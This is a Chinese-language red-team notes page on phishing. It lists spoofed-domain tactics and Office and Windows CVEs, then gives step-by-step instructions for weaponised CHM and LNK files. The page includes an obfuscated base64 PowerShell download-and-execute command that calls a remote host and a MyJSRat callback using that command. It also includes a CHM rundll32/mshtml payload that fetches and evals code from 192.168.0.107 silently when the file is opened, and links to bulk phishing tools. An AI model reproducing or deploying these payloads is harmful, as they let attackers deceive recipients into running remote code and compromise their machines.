钓鱼邮件

邮件服务器搭建

https://github.com/biggerduck/RedTeamNotes/blob/main/%E7%BA%A2%E9%98%9F%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD%E4%B9%8B%E9%82%AE%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA.pdf

钓鱼邮件

假冒的内部域名
假冒的外部域名
近似域名
被黑账户
群发/特定发
虚构情景/恶意连接/恶意文件

CVE

CVE-2017-11882

Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016

CVE-2017-0199

Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016，Vista SP2，Server 2008 SP2，Windows 7 SP1，Windows 8.1

CVE-2012-0158

Microsoft Office 2003 SP3、2007 SP2和SP3，以及2010 Gold和SP1；Office 2003 Web组件SP3；SQL Server 2000 SP4、2005 SP4和2008 SP2，SP3和R2; BizTalk Server 2002 SP1；Commerce Server 2002 SP4、2007 SP2和2009 Gold和R2; Visual FoxPro 8.0 SP1和9.0 SP2; 和Visual Basic 6.0

CVE-2017-0143

Microsoft Windows Vista SP2；Windows Server 2008 SP2和R2 SP1; Windows 7 SP1；Windows 8.1; Windows Server 2012 Gold和R2；Windows RT 8.1；Windows 10 Gold，1511和1607；以及 和Windows Server 2016
OFFICE文档/ PDF文件

可执行文件

文档文件的伪造

扩展名/图标

捆绑

宏

0day

CHM

使用编译的HTML文件加载恶意代码。
使用EasyCHM对html进行编译，在html文件中插入恶意代码。
使用MSF生成powershell格式的web_delivery模块
使用Rundll32配合MyJSRAT实施运行无弹窗

把命令base编码避免特殊符号

执行语句编码后
>powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA==
通过JSRat执行powershell上线命令
https://github.com/Ridter/MyJSRat
>python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA=="

访问http://ip/wtf复制利用语句到html文件后编译

<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>

正常打开CHM文件，无弹窗上线。

LNK钓鱼

https://github.com/Yihsiwei/Lnk-Trojan
https://github.com/biggerduck/RedTeamNotes/blob/main/lnk%E9%92%93%E9%B1%BC%E6%A0%B7%E6%9C%AC%E7%9A%84%E5%88%B6%E4%BD%9C.pdf

自动化批量化发送钓鱼邮件

https://github.com/SkewwG/henggeFish

最后更新于3年前

这有帮助吗？